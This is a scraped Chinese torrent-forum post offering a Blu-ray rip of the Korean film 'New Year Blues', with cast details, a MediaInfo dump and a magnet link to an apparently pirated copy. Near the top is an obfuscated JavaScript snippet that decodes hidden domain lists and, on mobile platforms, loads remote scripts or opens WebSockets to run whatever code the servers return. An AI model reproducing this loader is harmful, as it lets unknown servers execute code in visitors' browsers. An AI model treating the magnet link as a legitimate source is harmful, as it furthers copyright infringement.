新年前夜[中文字幕]New.Year.Blues.2021.1080p.BluRay.x264.DTS-迅雷下载 11.28GB

版主小s 20天前 1405

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 新年前夜 / 新年前夕(港) / 今天决定我爱你(台) / New Year Blues

◎片 名 ????

◎年 代 2021

◎产 地 韩国

◎类 别 爱情

◎语 言 韩语

◎上映日期 2021-02-10(韩国)

◎IMDb链接 https://www.imdb.com/title/tt13893464/

◎豆瓣评分 5.7/10 (844人评价)

◎豆瓣链接 https://movie.douban.com/subject/34617219/

◎片 长 114分钟

◎导 演 洪智暎 Ji-Yeong Hong (id:1324365)

◎演 员 金康宇 Kang-woo Kim (id:1193404)

刘寅娜 In-na Yoo (id:1314862)

柳演锡 Yeon-Seok Yoo (id:1321213)

李沇熹 Yeon-hee Lee (id:1230320)

李东辉 Dong-Hwi Lee (id:1353574)

陈都灵 Duling Chen (id:1342249)

廉惠兰 Yum Hye-ran (id:1378885)

崔秀英 Sooyoung Choi (id:1321436)

刘台午 Teo Yoo (id:1343343)

艺秀晶 Ye Soo-jung (id:1382568)

崔始源 Si-won Choi (id:1240451)

安世河 Se-ha Ahn (id:1352668)

赵汉哲 Han-chul Jo (id:1386180)

罗美兰 Mi-ran Ra (id:1329322)

李俊赫 Lee Joon-Hyuk (id:1331785)

徐贤宇 Seo Hyeon-woo (id:1379938)

金光奎 Kwang-gyu Kim (id:1317057)

金釉利 Kim Yuri (id:1325681)

◎标 签 韩国 / 爱情 / 韩国电影 / 柳演锡 / 刘仁娜 / 2021 / 李沇熹 / 2020

◎简 介

电影讲述了在新年即将到来之前,四对情侣在克服恐惧与不安的同时,度过了一周欢笑与浪漫并存的时光。

  1. General

  2. Unique ID : 71808560991141286675208884735612498493 (0x3605D366D143B296A6C82A64499B323D)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.3 GiB

  7. Duration : 1 h 54 min

  8. Overall bit rate : 14.1 Mb/s

  9. Movie name : New Year Blues 2021

  10. Encoded date : UTC 2021-07-10 01:11:26

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 54 min

  25. Bit rate : 12.6 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.339

  36. Stream size : 10.0 GiB (89%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.62 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 54 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.20 GiB (11%)

  57. Language : Korean

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4610 (0x1202)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 1 h 49 min

  69. Bit rate : 28.7 kb/s

  70. Count of elements : 3431

  71. Stream size : 22.6 MiB (0%)

  72. Title : chs

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4611 (0x1203)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 49 min

  85. Bit rate : 29.1 kb/s

  86. Count of elements : 3431

  87. Stream size : 22.9 MiB (0%)

  88. Title : cht

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4608 (0x1200)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 49 min

  101. Bit rate : 20.4 kb/s

  102. Count of elements : 2716

  103. Stream size : 16.0 MiB (0%)

  104. Language : Korean

  105. Default : No

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #4

  109. ID : 6

  110. ID in the original source medium : 4609 (0x1201)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 1 h 49 min

  116. Bit rate : 32.9 kb/s

  117. Count of elements : 3453

  118. Stream size : 25.8 MiB (0%)

  119. Language : English

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Menu

  124. 00:00:00.000 : Chapter 01

  125. 00:06:06.449 : Chapter 02

  126. 00:20:36.944 : Chapter 03

  127. 00:32:16.392 : Chapter 04

  128. 00:43:57.885 : Chapter 05

  129. 00:58:28.421 : Chapter 06

  130. 01:13:12.137 : Chapter 07

  131. 01:26:22.510 : Chapter 08

  132. 01:39:06.565 : Chapter 09

  133. 01:50:11.521 : Chapter 10


TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:E405FC2710BC05C9A195F48ACEB78B9DDE0D45DA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回